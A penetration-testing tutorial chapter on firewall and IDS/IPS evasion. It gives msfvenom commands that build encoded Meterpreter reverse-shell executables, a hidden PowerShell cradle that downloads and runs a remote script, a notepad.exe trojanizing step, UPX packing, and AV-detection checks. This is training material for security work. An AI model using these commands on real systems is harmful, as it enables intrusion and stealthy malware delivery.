Firewall and IDS/IPS Evasion
Overview
Firewalls and intrusion detection/prevention systems (IDS/IPS) are critical components of modern network security. As penetration testers, understanding how to bypass these defenses is essential for conducting stealthy and effective engagements. This chapter covers techniques for evading detection and delivering payloads while maintaining operational security.
Firewall and IDS/IPS Basics
Firewalls:
Control traffic flow based on predefined rules.
Block or allow packets based on:
Source/Destination IP
Ports
Protocols
Types:
Network Firewalls (e.g., hardware-based solutions like Cisco ASA)
Host-Based Firewalls (e.g., Windows Defender Firewall)
IDS/IPS:
IDS (Intrusion Detection System): Monitors traffic for suspicious activity and raises alerts.
IPS (Intrusion Prevention System): Actively blocks malicious traffic.
Detection methods:
Signature-Based: Matches traffic patterns against known attack signatures.
Anomaly-Based: Flags traffic that deviates from normal behavior.
Techniques for Firewall Evasion
Port Spoofing:
Use non-standard ports for payload delivery (e.g., port 443 for HTTPS).
Example:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=443 -f exe > payload.exe
Payload Obfuscation:
Encode payloads using tools like
msfvenom
:msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe > encoded_payload.exe
Split Payload Delivery:
Deliver payloads in fragments to bypass large-payload filters.
Example: Use PowerShell to download and execute a payload in memory:
powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://<ip>/payload.ps1')"
DNS Tunneling:
Encapsulate payload traffic in DNS queries to bypass firewalls.
Example tool:
dnscat2
.
HTTP/HTTPS Tunneling:
Use HTTP/HTTPS to route traffic through firewalls that allow web traffic.
Configure a reverse shell:
msfvenom -p windows/meterpreter/reverse_https LHOST=<ip> LPORT=443 -f exe > https_payload.exe
Techniques for IDS/IPS Evasion
Signature Evasion:
Modify payloads to avoid matching known attack patterns:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -e x86/shikata_ga_nai -f exe > stealth_payload.exe
Traffic Encryption:
Use encrypted channels (e.g., HTTPS) for command and control traffic.
Example:
use exploit/multi/handler set payload windows/meterpreter/reverse_https set LHOST <ip> set LPORT 443 exploit
Timing Attacks:
Send traffic in bursts or delays to avoid triggering anomaly-based detection.
Example: Use Nmap with timing options:
nmap -T2 -sS <target_ip>
Packer Tools:
Use packers to obfuscate executable payloads.
Popular packers:
UPX:
upx --best --lzma payload.exe
Themida: Advanced commercial packer with anti-reverse engineering features.
Legitimate Application Templates:
Embed payloads in legitimate applications or documents.
Example:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -x notepad.exe -k -f exe > notepad_payload.exe
Evasion Example: Using msfvenom with Custom Templates
Generate an Encrypted Payload:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -e x86/shikata_ga_nai -i 3 -f exe > payload.exe
Embed Payload in a Legitimate Application:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -x notepad.exe -k -f exe > safe_payload.exe
Use HTTPS for Stealth:
msfvenom -p windows/meterpreter/reverse_https LHOST=<ip> LPORT=443 -f exe > https_payload.exe
Verify Payload Detection:
Upload the payload to VirusTotal to check for AV detection:
msf-virustotal -k <api_key> -f payload.exe
Best Practices for Evasion
Test in a Sandbox:
Verify payload functionality in a controlled environment.
Avoid Reuse:
Customize payloads for each engagement to avoid detection by updated signatures.
Combine Techniques:
Layer multiple evasion methods (e.g., encoding + encryption).
Stay Updated:
Keep up with the latest evasion techniques and tools.
Command Cheatsheet
msfvenom -p <payload>
Generate payloads.
msfvenom -e <encoder>
Encode payloads for evasion.
upx --best --lzma <file>
Compress and obfuscate payloads.
msf-virustotal -k <api_key>
Check payload detection rates on VirusTotal.
nmap -T2
Conduct slow scans to avoid IDS detection.